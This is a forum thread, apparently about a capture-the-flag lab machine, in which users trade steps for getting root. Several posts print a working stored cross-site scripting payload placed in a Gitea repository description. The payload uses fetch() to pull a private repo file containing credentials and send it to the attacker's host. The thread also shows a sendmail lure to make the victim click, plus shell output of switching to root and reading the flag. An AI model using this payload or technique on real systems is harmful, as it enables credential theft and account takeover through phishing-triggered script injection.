Posts: 33
Threads: 1
Joined: Oct 2024
(Feb 02, 2025, 02:23 AM)maggi Wrote: (Feb 02, 2025, 02:16 AM)Mayilvaganam Wrote: (Feb 02, 2025, 01:55 AM)maggi Wrote: (Feb 02, 2025, 01:49 AM)anon493483 Wrote: (Feb 02, 2025, 01:07 AM)maggi Wrote: people be posting user+root passwd but if you want to know....
start python server port 80 on kalibox
create repo maggi
create blank file in repo called...."maggi"
put this payload in description
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.xx.xx/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">maggi</a>
Then send an email as axel to jobert......click the new "maggi" in the repo and be patient and wait for something on python server like:
[01/Feb/2025 19:42:30] "GET /?response=%3C%3Fphp%0A%24valid_username.........
axel@cat:/var/mail$ echo -e "Subject: test \n\nHello check my repo http://localhost:3000/axel/maggi" | sendmail jobert@LocalHost
axel@cat:/var/mail$ su root
Password:
root@cat:/var/mail# cd /root
root@cat:~# cat root.txt
25880005d****************
root@cat:~#
Where did you find info about the Employee-management repo?
Check Axel's mail
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Empl...anagement/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Empl.../README.md.
Jobert is not clicking my link , what to do ? Not getting any response after sending mail
you need to click the link "maggi" under maggi in axels repo and send off that mail.....or other way around
it doesnt work
`[01/Feb/2025 21:44:34] "GET /?response=Not%20found.%0A HTTP/1.1" 200 -`
Posts: 14
Threads: 0
Joined: Jan 2025
How did you guys find creds for Gitea?
Posts: 33
Threads: 1
Joined: Oct 2024
(Feb 02, 2025, 02:49 AM)4yhg5y72jffg820j3f Wrote: How did you guys find creds for Gitea?
Use the same credentials, as you used for axel
Posts: 196
Threads: 31
Joined: Apr 2024
(Feb 02, 2025, 02:46 AM)samuelballsiu1 Wrote: (Feb 02, 2025, 02:23 AM)maggi Wrote: (Feb 02, 2025, 02:16 AM)Mayilvaganam Wrote: (Feb 02, 2025, 01:55 AM)maggi Wrote: (Feb 02, 2025, 01:49 AM)anon493483 Wrote: Where did you find info about the Employee-management repo?
Check Axel's mail
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Empl...anagement/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Empl.../README.md.
Jobert is not clicking my link , what to do ? Not getting any response after sending mail
you need to click the link "maggi" under maggi in axels repo and send off that mail.....or other way around
it doesnt work
`[01/Feb/2025 21:44:34] "GET /?response=Not%20found.%0A HTTP/1.1" 200 -`
be quick about it there is a cleanup script
Posts: 2
Threads: 0
Joined: Oct 2024
(Feb 02, 2025, 01:55 AM)maggi Wrote: (Feb 02, 2025, 01:49 AM)anon493483 Wrote: (Feb 02, 2025, 01:07 AM)maggi Wrote: people be posting user+root passwd but if you want to know....
start python server port 80 on kalibox
create repo maggi
create blank file in repo called...."maggi"
put this payload in description
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.xx.xx/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">maggi</a>
Then send an email as axel to jobert......click the new "maggi" in the repo and be patient and wait for something on python server like:
[01/Feb/2025 19:42:30] "GET /?response=%3C%3Fphp%0A%24valid_username.........
axel@cat:/var/mail$ echo -e "Subject: test \n\nHello check my repo http://localhost:3000/axel/maggi" | sendmail jobert@LocalHost
axel@cat:/var/mail$ su root
Password:
root@cat:/var/mail# cd /root
root@cat:~# cat root.txt
25880005d****************
root@cat:~#
Where did you find info about the Employee-management repo?
Check Axel's mail
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Empl...anagement/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Empl.../README.md.
ack. totally glossed over that. thanks!
Posts: 49
Threads: 0
Joined: Dec 2024
(Feb 02, 2025, 02:57 AM)maggi Wrote: (Feb 02, 2025, 02:46 AM)samuelballsiu1 Wrote: (Feb 02, 2025, 02:23 AM)maggi Wrote: (Feb 02, 2025, 02:16 AM)Mayilvaganam Wrote: (Feb 02, 2025, 01:55 AM)maggi Wrote: Check Axel's mail
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Empl...anagement/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Empl.../README.md.
Jobert is not clicking my link , what to do ? Not getting any response after sending mail
you need to click the link "maggi" under maggi in axels repo and send off that mail.....or other way around
it doesnt work
`[01/Feb/2025 21:44:34] "GET /?response=Not%20found.%0A HTTP/1.1" 200 -`
be quick about it there is a cleanup script
Man the box should have been named clearner, cause darn. Can't get anything done. Stuck on root as the jobert is not clicking the link This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 14
Threads: 0
Joined: Jan 2025
jobert finally clicked, you gotta spam him with emails, and make sure your repo has not been purged by the cleanup scripts
Posts: 49
Threads: 0
Joined: Dec 2024
(Feb 02, 2025, 03:47 AM)4yhg5y72jffg820j3f Wrote: jobert finally clicked, you gotta spam him with emails, and make sure your repo has not been purged by the cleanup scripts
Still can't understand I did all that. Spammed him, clicked on the link and make sure it was still on the gitea but my repo was never clicked... This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 196
Threads: 31
Joined: Apr 2024
Feb 02, 2025, 05:23 AM
(This post was last modified: Feb 02, 2025, 05:27 AM by maggi.)
(Feb 02, 2025, 04:14 AM)0xbeef Wrote: (Feb 02, 2025, 03:47 AM)4yhg5y72jffg820j3f Wrote: jobert finally clicked, you gotta spam him with emails, and make sure your repo has not been purged by the cleanup scripts
Still can't understand I did all that. Spammed him, clicked on the link and make sure it was still on the gitea but my repo was never clicked... wouldn't send a mail....
you create the repo "maggi" with a payload in the description field
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.xx.xx/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">test</a>
Then create newfile called test leave it blank, nothing in description
now there should be a test under maggi in axel
Send the mail as axle
click test
wait....a good 10 seconds and encoded snippet with passwd comes back on 80
That worked for me hope it helps
Posts: 216
Threads: 42
Joined: Nov 2024
I have added user and root ssh pass on the first page.
|
